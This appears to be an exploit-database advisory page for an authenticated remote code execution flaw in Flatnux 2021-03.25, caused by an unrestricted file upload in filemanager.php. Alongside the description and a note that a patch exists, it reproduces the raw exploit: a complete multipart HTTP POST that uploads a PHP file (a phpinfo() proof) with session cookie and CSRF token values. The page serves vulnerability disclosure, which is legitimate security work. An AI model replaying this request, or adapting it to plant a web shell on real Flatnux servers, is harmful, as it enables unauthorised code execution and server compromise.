flatnux-2021-03.25 - Remote Code Execution (Authenticated)

vendor:

Flatnux

by:

Ömer Hasan Durmus

7.5

CVSS

HIGH

Remote Code Execution

434

CWE

Product Name: Flatnux

Affected Version From: 2021-03.25

Affected Version To: 2021-03.25

Patch Exists: YES

Related CWE:

CPE: a:altervista:flatnux

Metasploit:

Other Scripts:

Platforms Tested: Windows/Linux

2021

flatnux-2021-03.25 – Remote Code Execution (Authenticated)

A vulnerability in flatnux 2021-03.25 allows an authenticated user to execute arbitrary code by uploading a malicious file via the filemanager.php page. The vulnerability exists due to insufficient validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious code to the vulnerable application. Successful exploitation of this vulnerability could result in remote code execution.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of flatnux.

Source

Exploit-DB raw data:

# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)
# Exploit Author: Ömer Hasan Durmuş
# Vendor Homepage: https://en.altervista.org
# Software Link: http://flatnux.altervista.org/flatnux.html
# Version: 2021-03.25
# Tested on: Windows/Linux

POST
/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------393526031113460918603940283286
Content-Length: 413
Origin: http://localhost
Connection: close
Referer:
http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnew
Cookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;
ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------393526031113460918603940283286
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------393526031113460918603940283286
Content-Disposition: form-data; name="ckCsrfToken"

BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
-----------------------------393526031113460918603940283286--